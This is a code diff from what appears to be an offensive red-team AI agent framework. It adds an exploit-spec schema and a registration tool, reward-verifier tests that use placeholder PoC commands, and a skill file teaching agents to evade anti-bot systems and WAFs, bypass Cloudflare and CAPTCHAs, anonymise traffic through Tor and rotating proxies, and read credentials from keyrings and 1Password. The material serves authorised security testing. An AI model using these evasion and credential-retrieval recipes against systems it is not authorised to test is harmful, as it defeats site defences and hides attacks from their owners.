baseline command") + target_checks: list[TargetCheck] = Field(default_factory=list) + runs: int = Field(default=1, ge=1, le=10, description="Number of PoC runs for consensus") + min_success_rate: float = Field( + default=1.0, ge=0.0, le=1.0, description="Fraction of runs that must succeed" + ) + impact_patterns: list[str] = Field( + default_factory=list, + description="Regexes proving actual impact (data exfil, priv esc, RCE confirmation)", + ) + target_host: str | None = Field( + default=None, description="Primary target host — used for dedup fingerprint" + ) diff --git a/decepticon/tools/ad/bloodhound.py b/decepticon/tools/ad/bloodhound.py index 569bbd06..e1a57991 100644 --- a/decepticon/tools/ad/bloodhound.py +++ b/decepticon/tools/ad/bloodhound.py @@ -121,7 +121,12 @@ def _upsert_bh_object(graph: KnowledgeGraph, obj: dict[str, Any], type_name: str def _build_bh_index(graph: KnowledgeGraph) -> dict[str, Node]: """Build a bh_id → Node lookup for O(1) principal resolution.""" - return {n.props.get("bh_id"): n for n in graph.nodes.values() if n.props.get("bh_id")} + result: dict[str, Node] = {} + for n in graph.nodes.values(): + bh_id = n.props.get("bh_id") + if bh_id is not None: + result[str(bh_id)] = n + return result def _ingest_aces( diff --git a/decepticon/tools/interaction/complete_planning.py b/decepticon/tools/interaction/complete_planning.py index 3da090f6..38cceffd 100644 --- a/decepticon/tools/interaction/complete_planning.py +++ b/decepticon/tools/interaction/complete_planning.py @@ -13,7 +13,17 @@ from langchain_core.tools import InjectedToolCallId, tool from langgraph.config import get_stream_writer -from pydantic import Field +from pydantic import BeforeValidator, Field + + +def _sanitize_engagement_name(v: str) -> str: + """Coerce engagement_name to valid slug: strip, fallback, truncate.""" + if not isinstance(v, str): + return "unnamed-engagement" + v = v.strip() + if not v: + return "unnamed-engagement" + return v[:64] def _safe_writer(): @@ -27,6 +37,7 @@ def _safe_writer(): def complete_engagement_planning( engagement_name: Annotated[ str, + BeforeValidator(_sanitize_engagement_name), Field( min_length=1, max_length=64, diff --git a/decepticon/tools/research/exploit_spec_writer.py b/decepticon/tools/research/exploit_spec_writer.py new file mode 100644 index 00000000..edf8b4b1 --- /dev/null +++ b/decepticon/tools/research/exploit_spec_writer.py @@ -0,0 +1,70 @@ +"""LangChain tool for offensive agents to register machine-readable exploit specs.""" + +from __future__ import annotations + +import logging +from pathlib import Path + +from langchain_core.tools import tool + +from decepticon.schemas.exploit_spec import ExploitSpec + +log = logging.getLogger("decepticon.tools.research.exploit_spec_writer") + +_workspace: Path | None = None + + +def set_exploit_spec_workspace(workspace: Path) -> None: + """Inject the engagement workspace path for exploit_spec_register.""" + global _workspace + _workspace = workspace + + +@tool +def exploit_spec_register(spec_json: str) -> str: + """Register a machine-readable exploit spec for environment-grounded re-attack verification. + + Call this after writing FIND-NNN.md for a successful exploit. The spec enables + the EnvironmentVerifier to replay the exploit after defenses are applied, + producing a grounded RLVR reward signal without LLM judgment. + + Args: + spec_json: JSON string conforming to ExploitSpec schema. Required fields: + - finding_ref: "FIND-001" + - poc_command: exact shell command reproducing the exploit + - success_patterns: list of regexes proving exploit succeeded (min 1) + Optional: + - negative_command: ZFP baseline + - target_checks: list of PortCheck/ServiceCheck/CommandOutputCheck/etc. + """ + try: + spec = ExploitSpec.model_validate_json(spec_json) + except Exception as exc: + return f"ERROR: Invalid ExploitSpec JSON: {exc}" + + ws = _workspace + if ws is None: + return ( + "ERROR: exploit_spec_writer workspace not initialized " + "(call set_exploit_spec_workspace first)" + ) + + out_dir = ws / "findings" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{spec.finding_ref}-exploit-spec.json" + try: + path.write_text(spec.model_dump_json(indent=2), encoding="utf-8") + except OSError as exc: + return f"ERROR: Could not write exploit spec: {exc}" + + log.info("Exploit spec registered for %s at %s", spec.finding_ref, path) + return ( + f"ExploitSpec registered for {spec.finding_ref}.\n" + f"File: {path}\n" + f"PoC command: {spec.poc_command[:120]}\n" + f"Success patterns: {len(spec.success_patterns)}\n" + f"Target checks: {len(spec.target_checks)}" + ) + + +EXPLOIT_SPEC_TOOLS = [exploit_spec_register] diff --git a/decepticon/tools/research/tools.py b/decepticon/tools/research/tools.py index 821dca4e..836334c0 100644 --- a/decepticon/tools/research/tools.py +++ b/decepticon/tools/research/tools.py @@ -213,7 +213,11 @@ def _iter_requirements(path: Path) -> list[tuple[str, str, str]]: def _iter_package_lock(path: Path) -> list[tuple[str, str, str]]: deps: list[tuple[str, str, str]] = [] - payload = json.loads(path.read_text(encoding="utf-8")) + try: + payload = json.loads(path.read_text(encoding="utf-8")) + except (FileNotFoundError, PermissionError, json.JSONDecodeError, OSError) as exc: + log.warning("Failed to parse package-lock.json %s: %s", path, exc) + return deps packages = payload.get("packages") if isinstance(packages, dict): @@ -1631,25 +1635,22 @@ def suggest_objectives_from_chains( highest = Severity.INFO for step in chain.steps: - step_mitre = step.node.props.get("mitre") - if isinstance(step_mitre, list): - mitre.extend([m for m in step_mitre if isinstance(m, str)]) - sev = _severity_from_string(step.node.props.get("severity")) + sev = _severity_from_string(step.node_kind) if sev in {Severity.CRITICAL, Severity.HIGH}: highest = sev phase = "initial-access" - if any(step.node.kind in {NodeKind.CREDENTIAL, NodeKind.SECRET} for step in chain.steps): + if any(step.node_kind in {NodeKind.CREDENTIAL, NodeKind.SECRET} for step in chain.steps): phase = "post-exploit" elif ( - "admin" in chain.crown_jewel.label.lower() - or "domain" in chain.crown_jewel.label.lower() + "admin" in chain.crown_jewel_label.lower() + or "domain" in chain.crown_jewel_label.lower() ): phase = "post-exploit" - title = f"Exploit chain {idx}: {chain.entrypoint.label} -> {chain.crown_jewel.label}" + title = f"Exploit chain {idx}: {chain.entrypoint_label} -> {chain.crown_jewel_label}" acceptance = [ - f"Demonstrate path from {chain.entrypoint.label} to {chain.crown_jewel.label}.", + f"Demonstrate path from {chain.entrypoint_label} to {chain.crown_jewel_label}.", "Capture evidence for each hop (commands, outputs, and impacted asset IDs).", "Validate the highest-risk step with PoC evidence or explain why blocked.", ] diff --git a/scripts/web-hotswap.sh b/scripts/web-hotswap.sh new file mode 100755 index 00000000..4614a19a --- /dev/null +++ b/scripts/web-hotswap.sh @@ -0,0 +1,139 @@ +#!/usr/bin/env bash +# web-hotswap.sh — Hot-swap web dashboard into running container +# +# Builds Next.js on the host, injects the output directly into the +# running decepticon-web container, then signals PID 1 (the entrypoint +# supervisor) to restart only the Next.js process. The terminal server +# stays alive — zero WebSocket disconnections for the operator. +# +# Usage: +# ./scripts/web-hotswap.sh # build + inject + reload +# ./scripts/web-hotswap.sh --skip-build # inject last build only +# ./scripts/web-hotswap.sh --full # build + inject + full container restart +# +# Speed: ~25s with build, ~5s inject-only +# Safety: terminal connections preserved (unless --full) + +set -euo pipefail + +REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)" +WEB_DIR="$REPO_ROOT/clients/web" +CONTAINER="decepticon-web" +STANDALONE="$WEB_DIR/.next/standalone/clients/web" + +RED='\033[0;31m' +GREEN='\033[0;32m' +YELLOW='\033[1;33m' +DIM='\033[2m' +NC='\033[0m' + +info() { echo -e "${GREEN}[hotswap]${NC} $*"; } +warn() { echo -e "${YELLOW}[hotswap]${NC} $*"; } +error() { echo -e "${RED}[hotswap]${NC} $*" >&2; } +dim() { echo -e "${DIM}[hotswap]${NC} $*"; } + +SKIP_BUILD=false +FULL_RESTART=false +for arg in "$@"; do + case "$arg" in + --skip-build) SKIP_BUILD=true ;; + --full) FULL_RESTART=true ;; + esac +done + +# Pre-flight +if ! docker inspect "$CONTAINER" --format '{{.State.Running}}' 2>/dev/null | grep -q true; then + error "$CONTAINER is not running" + exit 1 +fi + +START=$(date +%s) + +# ── Step 1: Build on host ───────────────────────────────────────── + +if [[ "$SKIP_BUILD" == false ]]; then + info "Building Next.js on host..." + cd "$WEB_DIR" + + DATABASE_URL="${DATABASE_URL:-postgresql://decepticon:decepticon@localhost:5432/decepticon_web}" \ + npx prisma generate --no-hints 2>&1 | tail -1 + + npm run build 2>&1 | tail -3 + + BUILD_END=$(date +%s) + info "Build completed in $((BUILD_END - START))s" +else + info "Skipping build (--skip-build)" + BUILD_END=$START + if [[ ! -d "$STANDALONE" ]]; then + error "No standalone build found — run without --skip-build first" + exit 1 + fi +fi + +# ── Step 2: Inject into container ───────────────────────────────── + +info "Injecting into $CONTAINER..." + +# Remove old .next (as root — container user is nextjs) +docker exec -u 0 "$CONTAINER" rm -rf /app/clients/web/.next + +# Standalone .next via tar pipe +(cd "$STANDALONE" && tar cf - .next) | docker exec -u 0 -i "$CONTAINER" tar xf - -C /app/clients/web/ + +# Static assets (not in standalone) +(cd "$WEB_DIR" && tar cf - .next/static) | docker exec -u 0 -i "$CONTAINER" tar xf - -C /app/clients/web/ + +# Terminal server +docker cp "$WEB_DIR/server/terminal-server.ts" "$CONTAINER:/app/clients/web/server/terminal-server.ts" + +# server.js (standalone entry point) +docker cp "$STANDALONE/server.js" "$CONTAINER:/app/clients/web/server.js" + +# Fix ownership +docker exec -u 0 "$CONTAINER" chown -R nextjs:nodejs \ + /app/clients/web/.next \ + /app/clients/web/server.js \ + /app/clients/web/server/terminal-server.ts + +INJECT_END=$(date +%s) +dim "Inject completed in $((INJECT_END - BUILD_END))s" + +# ── Step 3: Reload ──────────────────────────────────────────────── + +if [[ "$FULL_RESTART" == true ]]; then + info "Full container restart (--full)..." + docker restart "$CONTAINER" >/dev/null 2>&1 + # Wait for healthy + for _ in $(seq 1 30); do + status=$(docker inspect "$CONTAINER" --format '{{.State.Health.Status}}' 2>/dev/null || echo "unknown") + [[ "$status" == "healthy" ]] && break + sleep 1 + done +else + # Signal PID 1 to restart only Next.js (terminal server stays alive) + info "Reloading Next.js (terminal stays connected)..." + docker kill --signal=USR1 "$CONTAINER" >/dev/null 2>&1 || { + warn "SIGUSR1 failed — falling back to container restart" + docker restart "$CONTAINER" >/dev/null 2>&1 + } + # Wait for Next.js to come back up + for _ in $(seq 1 20); do + if curl -s -m 2 -o /dev/null http://localhost:3000/ 2>/dev/null; then + break + fi + sleep 1 + done +fi + +END=$(date +%s) + +# ── Verify ──────────────────────────────────────────────────────── + +HTTP_CODE=$(curl -s -m 5 -o /dev/null -w "%{http_code}" http://localhost:3000/ 2>/dev/null || echo "000") +if [[ "$HTTP_CODE" == "200" ]]; then + info "Done in $((END - START))s — http://localhost:3000 (HTTP $HTTP_CODE)" +else + error "Done in $((END - START))s but HTTP $HTTP_CODE — check: docker logs $CONTAINER" + exit 1 +fi diff --git a/skills/shared/stealth-infra/SKILL.md b/skills/shared/stealth-infra/SKILL.md new file mode 100644 index 00000000..0d087f44 --- /dev/null +++ b/skills/shared/stealth-infra/SKILL.md @@ -0,0 +1,334 @@ +--- +name: stealth-infra +description: "Anti-bot evasion, proxy rotation, credential retrieval from password managers, and stealth HTTP tooling for covert web operations." +allowed-tools: Bash Read +metadata: + subdomain: opsec + when_to_use: "stealth, anti-bot, captcha, Cloudflare bypass, WAF evasion, proxy rotation, cookie injection, password manager, keyring, 1Password, GNOME Keyring, OPSEC quiet, anti-detection, TLS fingerprint, browser impersonation" + tags: stealth, proxy, captcha, anti-bot, opsec, cookies, keyring + mitre_attack: T1562, T1036, T1090 +--- + +# Stealth Infrastructure — Anti-Bot Evasion & Covert Operations + +This skill covers the stealth tooling installed in the sandbox for evading anti-bot systems, rotating proxies, solving CAPTCHAs, and retrieving credentials from password managers. Use these tools when the engagement RoE specifies OPSEC level `quiet` or `silent`, or when targets deploy WAFs/anti-bot shields. + +## Available Libraries (Pre-Installed) + +| Library | Purpose | When to use | +|---------|---------|-------------| +| **scrapling** | Adaptive scraping with Cloudflare Turnstile bypass, StealthyFetcher | Primary choice for any anti-bot-protected target | +| **curl_cffi** | libcurl with impersonated TLS fingerprints (Chrome/Firefox/Safari) | When you need raw HTTP with real browser TLS | +| **tls_client** | Go-based TLS fingerprint impersonation via Python | Alternative to curl_cffi for different fingerprint profiles | +| **cloudscraper** | Cloudflare v1/v2 challenge solver | Legacy Cloudflare JS challenges | +| **fake-useragent** | Realistic, rotating User-Agent strings | Any HTTP request needing normal-looking UA | +| **proxychains4** | Force any CLI tool through a SOCKS/HTTP proxy chain | Route nmap/curl/subfinder through Tor or proxy | +| **tor** | Onion routing for IP anonymization | When source IP must not be linkable to operator | +| **keyring** | OS keyring access (GNOME Keyring, macOS Keychain, Windows Credential Vault) | Retrieve stored credentials without hardcoding | +| **python-socks** | SOCKS4/5 proxy support for asyncio | Async HTTP through proxies | +| **aiohttp-socks** | aiohttp + SOCKS proxy integration | Async scraping through proxy chains | + +## 1. Scrapling — Primary Anti-Bot Bypass + +Scrapling's `StealthyFetcher` uses a real Chromium instance with anti-fingerprinting patches. It bypasses Cloudflare Turnstile, Akamai, DataDome, and most JS challenges. + +```python +# Stealthy fetch — bypasses Cloudflare Turnstile and most anti-bot +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +page = StealthyFetcher.fetch( + "https://", + headless=True, + network_idle=True, + disable_resources=True, # skip images/fonts for speed +) +print(f"Status: {page.status}") +print(f"Title: {page.css(\"title::text\").get()}") +# Extract data +for link in page.css("a[href]"): + print(f" {link.attrib[\"href\"]}") +' 2>&1 | tee scrapling_result.txt +``` + +### With proxy rotation: +```python +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +page = StealthyFetcher.fetch( + "https://", + headless=True, + network_idle=True, + proxy={"server": "socks5://127.0.0.1:9050"}, # Tor +) +print(page.status, page.css("title::text").get()) +' +``` + +### Session persistence (cookies survive across requests): +```python +timeout 60 python3 -u -c ' +from scrapling.fetchers import StealthyFetcher + +# First request — login +fetcher = StealthyFetcher() +page = fetcher.fetch("https:///login", headless=True) +# Fill and submit login form... + +# Second request — authenticated, same session +page2 = fetcher.fetch("https:///dashboard", headless=True) +print(page2.css("h1::text").get()) +' +``` + +## 2. curl_cffi — TLS Fingerprint Impersonation + +Real browser TLS fingerprints without running a browser. Fastest option for API probing. + +```python +timeout 30 python3 -u -c ' +from curl_cffi import requests + +# Impersonate Chrome 131 +r = requests.get( + "https://", + impersonate="chrome131", + timeout=10, +) +print(f"Status: {r.status_code}") +print(f"Server: {r.headers.get(\"server\", \"?\")} | CF-RAY: {r.headers.get(\"cf-ray\", \"none\")}") +print(r.text[:500]) +' +``` + +### With proxy: +```python +r = requests.get( + "https://", + impersonate="chrome131", + proxies={"https": "socks5://127.0.0.1:9050"}, + timeout=10, +) +``` + +### Available impersonation profiles: +- `chrome99` through `chrome131` +- `firefox109`, `firefox133` +- `safari15_3`, `safari18_0` +- `edge99`, `edge101` + +## 3. Proxy Infrastructure + +### Proxychains (route any CLI tool through proxy) + +```bash +# Start Tor (if not running) +tor & +sleep 5 + +# Route curl through Tor +proxychains4 curl -s https://check.torproject.org/api/ip + +# Route any scanner through Tor +proxychains4 subfinder -d -silent +proxychains4 httpx-pd -l subdomains.txt -silent +``` + +### Free proxy rotation (Proxifly) + +```bash +# Download fresh proxy list +curl -sL https://cdn.jsdelivr.net/gh/proxifly/free-proxy-list@main/proxies/protocols/https/data.json -o proxies.json + +# Use in Python +timeout 30 python3 -u -c ' +import json, random +from curl_cffi import requests + +with open("proxies.json") as f: + proxies = json.load(f) + +# Pick a random proxy +proxy = random.choice(proxies) +proxy_url = f"{proxy[\"protocol\"]}://{proxy[\"ip\"]}:{proxy[\"port\"]}" +print(f"Using proxy: {proxy_url} ({proxy.get(\"country\", \"?\")})") + +r = requests.get( + "https://", + impersonate="chrome131", + proxies={"https": proxy_url}, + timeout=10, +) +print(f"Status: {r.status_code}") +' +``` + +### Custom proxy chain (edit /etc/proxychains4.conf) + +```bash +# For OPSEC-quiet: chain through your VPN + Tor +cat > /tmp/chain.conf << 'EOF' +strict_chain +proxy_dns +[ProxyList] +socks5 +socks5 127.0.0.1 9050 +EOF +proxychains4 -f /tmp/chain.conf curl -s https:// +``` + +## 4. Credential Retrieval from Password Managers + +### Python keyring (generic — works with GNOME Keyring, macOS Keychain, KWallet) + +```python +timeout 10 python3 -u -c ' +import keyring + +# Retrieve stored credential +password = keyring.get_password("telenor-vdp", "test-user") +if password: + print(f"Retrieved password for test-user: {password[:3]}***") +else: + print("No credential stored. Use: keyring.set_password(\"telenor-vdp\", \"test-user\", \"\")") +' +``` + +### Store credentials for the engagement: + +```python +timeout 10 python3 -u -c ' +import keyring +keyring.set_password("telenor-vdp", "test-user", "") +print("Credential stored in keyring") +' +``` + +### 1Password CLI (if configured): + +```bash +# Sign in (requires setup) +eval $(op signin) + +# Get a credential +op item get "Telenor VDP" --fields username,password --format=json +``` + +### Cookie injection from file: + +```python +# Load cookies exported from browser (Netscape format or JSON) +timeout 30 python3 -u -c ' +import json +from curl_cffi import requests + +# Load cookies from JSON file (exported via browser extension) +with open("/workspace/cookies.json") as f: + cookie_data = json.load(f) + +# Build cookie jar +cookies = {} +for c in cookie_data: + cookies[c["name"]] = c["value"] + +r = requests.get( + "https:///dashboard", + impersonate="chrome131", + cookies=cookies, + timeout=10, +) +print(f"Status: {r.status_code}") +print(r.text[:500]) +' +``` + +## 5. CAPTCHA Handling + +### Cloudflare Turnstile — Scrapling handles this automatically: +```python +# StealthyFetcher automatically solves Turnstile challenges +page = StealthyFetcher.fetch("https://", headless=True, network_idle=True) +# If Turnstile was present, page.status will be 200 (solved) or 403 (failed) +``` + +### For other CAPTCHAs (reCAPTCHA, hCaptcha): +1. **Manual solve**: Use Scrapling's StealthyFetcher to render the page, screenshot, solve manually +2. **Token injection**: If you have a CAPTCHA-solving service API key, inject the token: + +```python +timeout 60 python3 -u -c ' +from curl_cffi import requests + +# After obtaining CAPTCHA token from a solving service: +CAPTCHA_TOKEN = "" + +r = requests.post( + "https:///login", + impersonate="chrome131", + data={ + "username": "test", + "password": "test", + "g-recaptcha-response": CAPTCHA_TOKEN, + }, + timeout=10, +) +print(r.status_code, r.headers.get("location", "")) +' +``` + +## 6. Rate Limiting & Traffic Shaping + +```python +# Respectful rate-limited scraping +timeout 120 python3 -u -c ' +import time, random +from curl_cffi import requests +from fake_useragent import UserAgent + +ua = UserAgent() +TARGET = "https://" +PATHS = ["/api/users", "/api/orders", "/api/settings"] + +for path in PATHS: + # Random delay: 2-5 seconds (mimics human) + time.sleep(random.uniform(2, 5)) + + r = requests.get( + f"{TARGET}{path}", + impersonate="chrome131", + headers={"User-Agent": ua.random}, + timeout=10, + ) + print(f"{r.status_code} {path}: {len(r.text)} bytes") +' +``` + +## Anti-Patterns (Do NOT) + +- **Never** send requests at machine speed without delays — even 100ms intervals look like a scanner +- **Never** use default `python-requests` User-Agent for stealth operations — it's fingerprinted by every WAF +- **Never** hardcode credentials in scripts — use keyring or env vars +- **Never** skip the WAF detection step — knowing what you face determines the right bypass +- **Never** use raw `requests.get()` against Cloudflare — it will always fail; use curl_cffi or scrapling +- **Never** brute-force CAPTCHAs — solve or bypass them; repeated failures trigger IP bans + +## Decision Tree + +``` +Target has anti-bot? → Yes → Which type? + ├─ Cloudflare Turnstile → StealthyFetcher (automatic) + ├─ Cloudflare JS Challenge → cloudscraper or StealthyFetcher + ├─ Akamai/DataDome → StealthyFetcher with proxy rotation + ├─ reCAPTCHA/hCaptcha → Manual solve or token injection + └─ Custom WAF → curl_cffi with browser TLS fingerprint + +Target has rate limiting? → Yes + ├─ Soft (429 after N requests) → Add 2-5s random delays + └─ Hard (IP ban) → Rotate proxies via proxychains4 or Proxifly + +OPSEC level quiet/silent? + ├─ Use Tor for DNS + requests (proxychains4) + ├─ Rotate User-Agents (fake-useragent) + └─ Never reuse the same proxy for >10 requests +``` diff --git a/tests/unit/core/test_env_verifier.py b/tests/unit/core/test_env_verifier.py new file mode 100644 index 00000000..d16b58fd --- /dev/null +++ b/tests/unit/core/test_env_verifier.py @@ -0,0 +1,414 @@ +"""Unit tests for EnvironmentVerifier — environment-grounded vaccine verification.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Awaitable, Callable + +import pytest + +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.schemas.defense_brief import ReAttackOutcome +from decepticon.schemas.env_verification import ( + CheckPhase, + EnvironmentSnapshot, + PoCEvidence, + TargetCheckResult, + VerificationEvidence, +) +from decepticon.schemas.exploit_spec import ( + CommandOutputCheck, + ExploitSpec, +) + + +# ── Helpers ────────────────────────────────────────────────────────────────── + + +def make_runner( + poc_response: tuple[str, str, int] = ("PWNED root@target", "", 0), + negative_response: tuple[str, str, int] = ("clean", "", 0), + check_response: tuple[str, str, int] = ("matched", "", 0), +) -> Callable[[str], Awaitable[tuple[str, str, int]]]: + """Build a deterministic mock PoCRunner that branches on command shape.""" + + async def _run(command: str) -> tuple[str, str, int]: + if "PWNED" in command or "exploit" in command.lower(): + return poc_response + if "clean_request" in command or "noop" in command: + return negative_response + return check_response + + return _run + + +def make_spec( + finding_ref: str = "FIND-001", + success_patterns: list[str] | None = None, + negative_command: str | None = None, +) -> ExploitSpec: + return ExploitSpec( + finding_ref=finding_ref, + poc_command="curl -X POST exploit", + success_patterns=success_patterns or ["PWNED"], + negative_command=negative_command, + target_checks=[ + CommandOutputCheck( + command="echo matched", + pattern="matched", + expect_match=True, + ) + ], + ) + + +# ── Test 1: Pre-defense exploit succeeds → PASSED, reward 0.0 ────────────── + + +async def test_pre_defense_exploit_passed(tmp_path: Path) -> None: + runner = make_runner(poc_response=("PWNED root@target", "", 0)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + pre = await verifier.capture_state(spec, phase=CheckPhase.PRE_DEFENSE) + # No POST snapshot pretend not yet defended; use pre as both + evidence = await verifier.verify_blocked(spec, pre=None, post=pre) + + assert evidence.re_attack_outcome == ReAttackOutcome.PASSED + assert "PWNED" in evidence.poc_evidence.success_signals_matched + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.0 + assert reward.outcome == ReAttackOutcome.PASSED + + +# ── Test 2: Post-defense exploit fails → BLOCKED, reward 1.0 ─────────────── + + +async def test_post_defense_exploit_blocked(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "Permission denied", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.re_attack_outcome == ReAttackOutcome.BLOCKED + assert evidence.poc_evidence.success_signals_matched == [] + reward = verifier.compute_reward(evidence) + assert reward.reward == 1.0 + assert reward.outcome == ReAttackOutcome.BLOCKED + + +# ── Test 3: ZFP demotion → ERROR, reward 0.0 ─────────────────────────────── + + +async def test_zfp_demotion_errors(tmp_path: Path) -> None: + # Both PoC and negative control match success patterns — noise signal + async def _run(command: str) -> tuple[str, str, int]: + return ("PWNED everywhere", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = make_spec(negative_command="curl noop") + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.poc_evidence.zfp_demoted is True + assert evidence.re_attack_outcome == ReAttackOutcome.ERROR + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.0 + assert reward.zfp_demoted is True + + +# ── Test 4: PARTIAL outcome → reward 0.5 ─────────────────────────────────── + + +async def test_partial_reward(tmp_path: Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + pre = EnvironmentSnapshot( + finding_ref="FIND-002", + phase=CheckPhase.PRE_DEFENSE, + results=[ + TargetCheckResult( + check_id="FIND-002-pre_defense-0", + kind="command", + phase=CheckPhase.PRE_DEFENSE, + positive=True, + ), + TargetCheckResult( + check_id="FIND-002-pre_defense-1", + kind="command", + phase=CheckPhase.PRE_DEFENSE, + positive=True, + ), + ], + ) + post = EnvironmentSnapshot( + finding_ref="FIND-002", + phase=CheckPhase.POST_DEFENSE, + results=[ + TargetCheckResult( + check_id="FIND-002-post_defense-0", + kind="command", + phase=CheckPhase.POST_DEFENSE, + positive=False, + ), + TargetCheckResult( + check_id="FIND-002-post_defense-1", + kind="command", + phase=CheckPhase.POST_DEFENSE, + positive=True, + ), + ], + ) + evidence = VerificationEvidence( + finding_ref="FIND-002", + pre_snapshot=pre, + post_snapshot=post, + poc_evidence=PoCEvidence( + exit_code=0, + success_signals_matched=["PWNED"], + zfp_demoted=False, + output_hash="abc123", + ), + re_attack_outcome=ReAttackOutcome.PARTIAL, + ) + reward = verifier.compute_reward(evidence) + assert reward.reward == 0.5 + assert reward.outcome == ReAttackOutcome.PARTIAL + assert reward.blocked_checks == 1 + assert reward.total_checks == 2 + + +# ── Test 5: persist_reward writes valid JSONL line ───────────────────────── + + +async def test_persist_reward_writes_jsonl(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "Permission denied", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + reward = verifier.compute_reward(evidence) + verifier.persist_reward(reward) + + rewards_path = tmp_path / "rlvr" / "rewards.jsonl" + assert rewards_path.exists() + lines = rewards_path.read_text(encoding="utf-8").strip().splitlines() + assert len(lines) == 1 + parsed = json.loads(lines[0]) + assert parsed["finding_ref"] == "FIND-001" + assert parsed["reward"] == 1.0 + assert parsed["outcome"] == "blocked" + + # Append-only: second write produces a second line + verifier.persist_reward(reward) + lines2 = rewards_path.read_text(encoding="utf-8").strip().splitlines() + assert len(lines2) == 2 + json.loads(lines2[1]) # validates JSON + + +# ── Test 6: spec round-trip via load_spec ────────────────────────────────── + + +async def test_load_spec_roundtrip(tmp_path: Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec("FIND-077") + findings_dir = tmp_path / "findings" + findings_dir.mkdir(parents=True) + (findings_dir / "FIND-077-exploit-spec.json").write_text( + spec.model_dump_json(indent=2), encoding="utf-8" + ) + loaded = verifier.load_spec("FIND-077") + assert loaded is not None + assert loaded.finding_ref == "FIND-077" + assert loaded.success_patterns == ["PWNED"] + + +async def test_load_spec_missing_returns_none(tmp_path: Path) -> None: + runner = make_runner() + verifier = EnvironmentVerifier(tmp_path, runner) + assert verifier.load_spec("FIND-NONE") is None + + +# ── Test 7: persist_snapshot + persist_evidence write to disk ────────────── + + +async def test_persistence_writes_snapshot_and_evidence(tmp_path: Path) -> None: + runner = make_runner(poc_response=("", "blocked", 1)) + verifier = EnvironmentVerifier(tmp_path, runner) + spec = make_spec() + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + verifier.persist_snapshot(post) + snap_path = tmp_path / "verification" / "FIND-001-post_defense-snapshot.json" + assert snap_path.exists() + + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + verifier.persist_evidence(evidence) + evidence_path = tmp_path / "verification" / "FIND-001-evidence.json" + assert evidence_path.exists() + parsed = json.loads(evidence_path.read_text(encoding="utf-8")) + assert parsed["finding_ref"] == "FIND-001" + + +# ── Test 9: N-run consensus 2-of-3 partial when threshold strict ────────── + + +async def test_n_run_consensus_2_of_3_partial(tmp_path: Path) -> None: + """spec.runs=3, min_success_rate=1.0. 1/3 succeeds → success_rate < threshold → PARTIAL.""" + call_count = {"n": 0} + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + call_count["n"] += 1 + if call_count["n"] == 1: + return ("PWNED root@target", "", 0) + return ("", "Permission denied", 1) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-RUN3", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + runs=3, + min_success_rate=1.0, + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.consensus is not None + assert evidence.consensus.n_runs == 3 + assert evidence.consensus.n_success == 1 + assert evidence.re_attack_outcome == ReAttackOutcome.PARTIAL + + +# ── Test 10: 2-of-3 with relaxed threshold + env unchanged → PASSED ─────── + + +async def test_n_run_consensus_2_of_3_blocked_when_threshold_met(tmp_path: Path) -> None: + """spec.runs=3, min_success_rate=0.5. 2/3 succeed → PASSED (signals still match).""" + call_count = {"n": 0} + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + call_count["n"] += 1 + if call_count["n"] <= 2: + return ("PWNED root@target", "", 0) + return ("", "Permission denied", 1) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-RUN3B", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + runs=3, + min_success_rate=0.5, + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.consensus is not None + assert evidence.consensus.n_success == 2 + assert evidence.consensus.success_rate >= 0.5 + assert evidence.re_attack_outcome == ReAttackOutcome.PASSED + + +# ── Test 11: invalid baseline → ERROR ───────────────────────────────────── + + +async def test_baseline_invalid_gives_error(tmp_path: Path) -> None: + """Invalid baseline (PoC fails pre-defense) → verify_blocked returns ERROR.""" + + async def _run(_: str) -> tuple[str, str, int]: + return ("", "Connection refused", 1) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = make_spec("FIND-BASE") + + baseline = await verifier.verify_baseline(spec) + assert baseline.valid is False + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post, baseline=baseline) + assert evidence.baseline_valid is False + assert evidence.re_attack_outcome == 